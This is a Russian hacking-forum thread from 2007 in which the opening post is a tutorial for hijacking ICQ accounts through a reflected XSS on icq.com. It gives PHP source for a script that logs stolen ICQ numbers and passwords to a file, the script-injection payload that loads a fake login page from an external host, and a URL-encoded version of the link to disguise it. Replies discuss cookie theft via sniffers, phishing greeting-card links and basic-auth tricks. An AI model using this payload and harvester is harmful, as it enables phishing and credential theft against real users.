Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Статьи (https://forum.antichat.xyz/forumdisplay.php?f=30)
-   -   Заходим в Icq через Xss (https://forum.antichat.xyz/showthread.php?t=53850)

NOmeR1 18.11.2007 18:26
Заходим в Icq через Xss
 
Заходим в Icq через Xss


В этой статье я расскажу, как можно использовать уязвимость XSS на сайте ICQ.com.

Всем известно, что через фейк можно угнать icq, но далеко не все станут заходить по ссылке vasya.com/fake.php.
Возникает вопрос, можно ли сделать так, чтобы фейк был на ICQ.com? Ответ простой - да, и не сложно.

...Немного теории...


Нам понадобится:
1. Хост с поддержкой PHP (платный или бесплатный)
2. Уязвимость (XSS)
3. Два скрипта :
1. Фейк
2. Сохранялка пароля (login.php)
Уязвимость ICQ.com - файл icq.com/people/ уязвимое поле gender, вот урл:
http://icq.com/people/?people_search=1&searched=1&gender=[xss]

Фейк получился у меня очень большой и не поместился в сообщение, поэтому скачать =)

Сохранялка пароля (login.php) очень простая
PHP код:
<?
$file 'icq.txt'// файлик
if( $_GET['delete'] == 'ok' )
{
    $f fopen($file'w');
    fwrite($fNULL);
    fclose($f);
    echo('Файл '.$file.' очищен');
}
elseif( $_POST['uin_email'] && $_POST['password'] )
{
    $f fopen($file'a');
    fwrite($f$_POST['uin_email'].';'.$_POST['password']."\n");
    fclose($f);
    header('Location: http://icq.com');
}
else
{
    header('Location: http://icq.com');
}
?>
$file можете изменить по своему желанию.

...От теории к практике...


Заливаем файл login.php на хост с поддержкой PHP.
Приётся немного подкорректировать фейк (script.js). Измените содержание переменной $fake (http://site/karma/login.php) на урл до login.php. Ну и собственно заливаем его туда же.
Теперь нам надо только составить урл уязвимости. Открываем http://icq.com/people/?people_search=1&searched=1&gender=[xss], но вместо [xss] напишем к примеру <xss_test>, теперь видим, что баг находится внутри скрипта:
Код:
<script type="text/javascript"        language="Javascript">                                               
        document.getElementById('gender').selectedIndex = <xss_test>;
        document.getElementById('fr_age_group').selectedIndex = 0;
</script>
Ну а теперь можно составить код, делающий фейк на этой странице, нам нужно, чтобы код выглядел так:
Код:
<script type="text/javascript"        language="Javascript">                                               
        document.getElementById('gender').selectedIndex = 1;</script><script src="путь_до_фейка"></script><script>//;
        document.getElementById('fr_age_group').selectedIn  dex = 0;
</script>
Наш урл будет выглядеть так:
http://icq.com/people/?people_search=1&searched=1&gender=1;</script><script src="путь_до_фейка"></script><script>//
Не очень красиво, согласитесь? Есть множество програм/тулз, которые маскируют ссылку, я выбрал способ - с помощью urlencode (в PHP).
Кто не знает, где найти маскировщик, юзайте мой (вписываете этот ява скрипт код и Url будет маскировкой).

У нас получится урл типо этого:
http://icq.com/people/?people_search=1&searched=1&gender=%31%3b%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%7 0%74%20%73%72%63%3d%22%ef%f3%f2%fc%5f%e4%ee%5f%f4% e5%e9%ea%e0%22%3e%3c%2f%73%63%72%69%70%74%3e%3c%73 %63%72%69%70%74%3e%2f%2f

Не супер секретная ссылка, но это, всё что можно сделать =)
Ах да, и ещё к сожалению, она не будет работать в осле, не знаю почему..

Теперь можете попробывать ввеси уин и пароль, и когда нажмёте submit, ваши данные сохранятся в файл, указанный в login.php (по умолчанию - icq.txt), а вы, как ни в чём не бывало, перейдёте на http://icq.com.
Вы так же можете очищать этот файл, зайдя на login.php?delete=ok.

P.S. Thx 2 inv за идею =)
P.P.S. Нет, я не увлёкся взломом ICQ, я просто решил поведать новичкам о том, как сделать фейк ICQ.com на самом же ICQ.com.

inv 18.11.2007 18:48
возможно фейк будет дописан
просьба не кидаться колкими словечками в Nomer1=)

Fata1ex 18.11.2007 18:54
NoScript отфильтровал нежелательную XSS отаку =)
Спасиб, +

Impuls* 20.11.2007 17:56
Что-то не работает у меня.
Должно появляться меню ввода что ли?
А куки можно стырить? =)

min7 20.11.2007 18:19
Цитата:
Сообщение от Impuls*
Что-то не работает у меня.
Должно появляться меню ввода что ли?
А куки можно стырить? =)
Зачем куки, если тебе пасс приплывает сразу?))

Sn@k3 20.11.2007 19:00
ну это уже разжовано, а хсс можно было взять и в статье уязвимостей, так что зря как статью, пихнул бы сразу в пассивные хсс

Spyder 20.11.2007 19:08
ну на данный момент актуально, но ведь никто не знает сколько проживёт Xss =)

Sn@k3 20.11.2007 19:10
Цитата:
Сообщение от Impuls*
Что-то не работает у меня.
Должно появляться меню ввода что ли?
А куки можно стырить? =)

по идею тебе должно прийти коокие файл на сниффер.

Кстати искомый алерт ни в опере ни в осле, что означает и не в фиреворксе не работает , вызывая в осле лишь ошибку =\ -) Кстати Номерьчег, а ты сам тестил?) и гиде файл-фейк? -)

inv 20.11.2007 19:23
%31%3b%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%7 0%74%20%73%72%63%3d%22%ef%f3%f2%fc%5f%e4%ee%5f%f4% e5%e9%ea%e0%22%3e%3c%2f%73%63%72%69%70%74%3e%3c%73 %63%72%69%70%74%3e%2f%2f

Sn@k3
код страницы посмотри
потом поймешь над кем надо смеяться=)(я тоже сначала не вкурил)

NOmeR1 20.11.2007 19:25
Цитата:
Сообщение от Sn@k3
по идею тебе должно прийти коокие файл на сниффер.

Кстати искомый алерт ни в опере ни в осле, что означает и не в фиреворксе не работает , вызывая в осле лишь ошибку =\ -) Кстати Номерьчег, а ты сам тестил?) и гиде файл-фейк? -)
По твоему посту я могу сказать, что ты не читал статью =)
http://icq.com/people/?people_search=1&searched=1&gender=1;</script><script>alert("XSS")</script>

Sn@k3 20.11.2007 19:49
ы ну да) да всровно кули толку на опере не утянешь, а в осле в основе сидят не просвященные с кривыми девятками, ну если тока пиарить по чатам бородина, ибо там сто пудов придеца юзать осла

PinkPanther 21.11.2007 00:50
раскрывал тему 2 года назад: http://www.xakep.ru/magazine/xa/083/060/1.asp . Даже конкурс в номере, который мы с Шанкаром прошли, точнее я помог ему пройти на данном тапе, построили по мотивам данной темы. Кроме 9-ок между прочим ничего и не ловится.

nc.STRIEM 21.11.2007 02:50
в файле script.js смысл сначало очищать document.body.innerHTML а потом через document.write() писать, есле можно сразу присвить значение document.body.innerHTML и все)
а так норм.

Constantine 21.11.2007 03:23
Вторичный до мозга костей метод. Единственная ценность статьи - готовый фейк

NOmeR1 21.11.2007 21:00
Цитата:
Сообщение от PinkPanther
раскрывал тему 2 года назад: http://www.xakep.ru/magazine/xa/083/060/1.asp . Даже конкурс в номере, который мы с Шанкаром прошли, точнее я помог ему пройти на данном тапе, построили по мотивам данной темы. Кроме 9-ок между прочим ничего и не ловится.
Звеняй, не знал.
Цитата:
Сообщение от Constantine
Вторичный до мозга костей метод. Единственная ценность статьи - готовый фейк
Да, да, да, но ведь это сайт ICQ.com, такое не часто бывает.

Scipio 02.12.2007 16:13
А вот это:
_http://www.icq.com/greetings/cards/139125/krl5l551/view/

отсылает IP на снифер ачата, оч удуобно, т.к. урл беспалевный и его легче вкрячить, чем вышеописанное

IIAHbI4 04.12.2007 00:34
хм ... создал диру /karma , туда login.php и script.js поместил, в script.js указал путь
Цитата:
http://xxx/karma.js
, пробую открыть линк у ся в броузере
Цитата:
http://icq.com/people/?people_search=1&searched=1&gender=1;%3C/script%3E%3Cscript%20src=%22http://хххх/karma/script.js%22%3E%3C/script%3E%3Cscript%3E//
чёт грузит, и потом страница пустая =\ мож я чт не так творю?

George767 04.12.2007 01:12
Цитата:
Сообщение от IIAHbI4
хм ... создал диру /karma , туда login.php и script.js поместил, в script.js указал путь, пробую открыть линк у ся в броузере
чёт грузит, и потом страница пустая =\ мож я чт не так творю?

тоже самое ...

Scipio 04.12.2007 17:10
Цитата:
Сообщение от NOmeR1
Да, да, да, но ведь это сайт ICQ.com, такое не часто бывает.
согласен с Constantine

пассивные XSS на icq.com, это далеко не чудеса, их там много, как и почти везде

вот допустим это демонстрирует более изящьный метод получения паролей:
[удалил, повесил снифф]

пример взят из статьи hidden`а, сам не стал писать, сразу же скажу для тех кто боится, что ничего там не сохраняется, а выводится на экран

George767 04.12.2007 22:08
Цитата:
Сообщение от Scipio
согласен с Constantine

пассивные XSS на icq.com, это далеко не чудеса, их там много, как и почти везде

вот допустим это демонстрирует более изящьный метод получения паролей:
_http://www.icq.com/greetings/cards/145879/sp99l1st/view/

пример взят из статьи hidden`а, сам не стал писать, сразу же скажу для тех кто боится, что ничего там не сохраняется, а выводится на экран
Открытку с чистым php кодом залить не удается, как смогли залить http://www.icq.com/greetings/cards/145879/sp99l1st/view ?

NOmeR1 04.12.2007 22:12
Цитата:
Сообщение от George767
Открытку с чистым php кодом залить не удается, как смогли залить http://www.icq.com/greetings/cards/145879/sp99l1st/view ?
Прочти статью hidden`а (http://forum.antichat.ru/thread20911.html) или посмотри моё видео (http://video.antichat.ru/file239.html).

Constantine 04.12.2007 22:19
старый фокус с бейсик авторизацией.. незнаю как много людей на это поведеться..

George767 04.12.2007 22:20
Цитата:
Сообщение от NOmeR1
Прочти статью hidden`а (http://forum.antichat.ru/thread20911.html) или посмотри моё видео (http://video.antichat.ru/file239.html).
Вопрос не в этом.

Сайт icq не принимает файл. Либо сообщение проверить формат, либо "no image format (gif, jpg, png)"

NOmeR1 04.12.2007 22:24
Цитата:
Сообщение от George767
Вопрос не в этом.

Сайт icq не принимает файл. Либо сообщение проверить формат, либо "no image format (gif, jpg, png)"
Скрипт на его сайте, он просто указал ссылку

George767 04.12.2007 22:29
Цитата:
Сообщение от NOmeR1
Скрипт на его сайте, он просто указал ссылку
а ясно тогда. Где же указывать ссылку на изображение в таком случае?

KPOT_f!nd 16.12.2007 19:31
Цитата:
ну на данный момент актуально, но ведь никто не знает сколько проживёт Xss =)
Их так там валом, и пассывные и активные)


Время: 03:49